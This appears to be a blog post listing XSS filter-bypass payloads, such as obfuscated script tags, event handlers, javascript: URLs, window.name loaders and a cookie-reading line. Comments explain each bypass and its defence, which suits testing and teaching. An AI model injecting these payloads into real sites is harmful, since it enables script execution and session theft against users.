一些常见的XSS的Payload

青灯古酒 发布于 2021-11-13 1864 次阅读


<!-- Script-tag variants for exercising a tag filter: a mixed-case tag name, a
     tag nested inside itself, and an HTML comment placed inside the tag name.
     A filter that compares exact-case strings, removes a match only once, or
     strips comments after it has checked tags can let a working tag through.
     Deleting substrings is not a reliable control; encode output for the
     context it lands in.
     NOTE(review): JavaScript identifiers are case-sensitive, unlike HTML tag
     names, so the mixed-case function name on the first line is not the
     built-in alert. -->
<SCRIPT>aLeRT(111)</sCRIpt>
<scri<script>pt>alert(111)</scri</script>pt>
<scri<!--test-->pt>alert(111)</sc<!--test-->ript>

<!-- No script tag in this group: the script sits in an inline event-handler
     attribute or in a javascript: URL, so a filter that only looks for the
     script tag does not see it. This first entry needs a user click. -->
<p onclick="alert(/xss/)">click it</p>

<!-- Error handler on a child element of a media tag. -->
<video><source onerror="alert(/xss/)">

<!-- javascript: scheme in href and formaction, and a toggle handler on a
     details element that is already open.
     For user-supplied markup: allowlist tags and attributes, drop every on*
     attribute, and accept only http(s) schemes in URL-valued attributes.
     A Content-Security-Policy without 'unsafe-inline' also blocks inline
     handlers and javascript: URLs. -->
<a href="javascript:alert(/xss/)">link</a>
<details open ontoggle="alert(/xss/)">
<form><button formaction="javascript:alert(/xss/)">X</button></form>

<!-- Three JavaScript expressions that resolve to the same window property:
     a bracket lookup, a name split by string concatenation, and a name
     decoded from base64 with atob. The second and third never contain the
     function name as one literal token, so matching on a keyword such as
     "alert" is not a control. Keep untrusted data out of script contexts. -->
window['alert'](/xss/)
window['al'+'ert'](/xss/)
window[atob("YWxl"+"cnQ")](/xss/)

<!-- Script element inside svg, with the parentheses written as URL-encoded
     character references (%26%23 is the URL encoding of the two characters
     that start a numeric reference). A filter has to decode input fully and
     inspect what the parser will finally see.
     NOTE(review): character references in script text are decoded in SVG
     content but not inside an HTML script element; confirm in the browsers
     you support. -->
<svg><script>alert%26%23x28;1%26%23xx29;</script></svg>

<!-- Two-stage entries: the injected handler is short and takes the real
     markup or URL from location.hash or window.name.
     The URL fragment is not sent to the server, so server-side filters and
     request logs never contain the second stage. Detection has to happen in
     the browser, for example through CSP violation reports and a review of
     DOM sinks such as outerHTML and location.
     NOTE(review): the second line looks like the tail of an enclosing tag
     whose name attribute carries the second stage; it is kept as published. -->
<input onfocus=outerHTML=decodeURI(location.hash)>#<img src=x onerror=alert(/xss/)>
%3Cinput%20onfocus=location=window.name%3E"name="javascript:alert(/xss/)"><iframe>

<!-- with(document) makes cookie resolve to document.cookie. Session cookies
     set with the HttpOnly attribute are not exposed to script. -->
with(document)alert(cookie)
<!-- The function is assigned to window.onerror and then triggered by throw,
     so the source contains no parentheses; filtering on "(" is not enough. -->
window.onerror=alert; throw 1
<!-- %0a (URL-encoded line feed) and "/" stand in for the space between the
     tag name and its attributes. An attribute filter must treat every HTML
     whitespace character and "/" as a separator. -->
<img %0asrc=x%0aonerror=alert(/xss/)>
<input/onfocus=alert(/xss/)>

<!-- window.name staging again, this time passed to eval and to $().
     window.name is set by whichever page opened or framed the document, so
     it is attacker-controlled input and must never reach eval or an
     HTML-building function.
     NOTE(review): $ is presumably jQuery, which builds DOM nodes when given
     an HTML string; confirm. Both lines look like the tail of an enclosing
     tag and are kept as published. -->
%3Cinput%20onfocus=eval(window.name)%3E"name="alert(/xss/)>
%3Cinput%20onfocus=$(window.name)%3E"name="<img src='x' onerror=alert(/xss/)/>"/>

<!-- One script split across three separate injection points. The JavaScript
     block comments swallow whatever page markup sits between the points, so
     a length limit or a check applied to each field on its own does not see
     the assembled script. Encode every field at output time. -->
stage1:<script>/*
stage2:*/alert(1)/*
stage3:*/</script>

<!-- Baseline cases: a plain script tag, an image error handler, a value that
     closes a quoted attribute and adds an event handler, and mixed-case and
     nested tag names against a tag filter.
     Defence common to all of them: HTML-encode < > & " ' on output, quote
     every attribute value, and do not rely on removing substrings.
     NOTE(review): the input line appears to show the attribute-value context
     the entries after it target, and t_sort looks like a parameter name from
     one specific practice target; confirm against the original post. The
     curly quote and the closing tag without a slash are kept as published. -->
<script>alert('xxs')</script>
<img src=1 onerror=alert(1)>
<input name="keyword" value="1"> and <script>alert('xxs')</script>
1’ onmouseover=alert(1)
<ScRiPt>alert(1)<ScRiPt>
<scscriptript>alert(1)</scscriptript>
&t_sort="type=text onmouseover="alert(1)"